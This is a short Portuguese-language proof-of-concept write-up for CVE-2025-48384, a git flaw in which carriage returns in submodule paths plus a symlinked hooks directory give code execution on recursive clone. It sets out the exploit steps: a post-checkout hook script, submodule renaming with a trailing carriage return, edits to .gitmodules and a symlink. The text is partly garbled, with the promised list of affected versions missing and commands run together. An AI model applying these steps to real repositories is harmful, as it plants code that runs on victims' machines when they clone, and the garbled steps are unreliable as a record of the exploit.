
PoC para CVE-2025-48384
CVE-2025-48384 assume a forma de uma vulnerabilidade de resolução de link inadequada (link following) no git. Especificamente, nomes de arquivo com retornos de carro são analisados incorretamente em .git/config, e incluir um link simbólico que aponte para um executável de hook git localizado em um submódulo como o diretório de hooks do submódulo pode levar à execução arbitrária de código quando o repositório é clonado com git clone --recursive.
O Git para Microsoft Windows não é afetado por esta vulnerabilidade, deixando principalmente versões específicas do git no Linux e MacOS vulneráveis. As versões afetadas são:
post-checkout para executar código quando o repositório poc for clonado recursivamente:#!/bin/bash
touch ~/hackedlol
git submodule add https://github.com/<your submodule repo>.git subgit mv sub $(printf "sub\r")printf "\tpath = \"sub\r\"\n" para .gitmodules e remova o caminho original.ln -s .git/modules/sub/hooks sub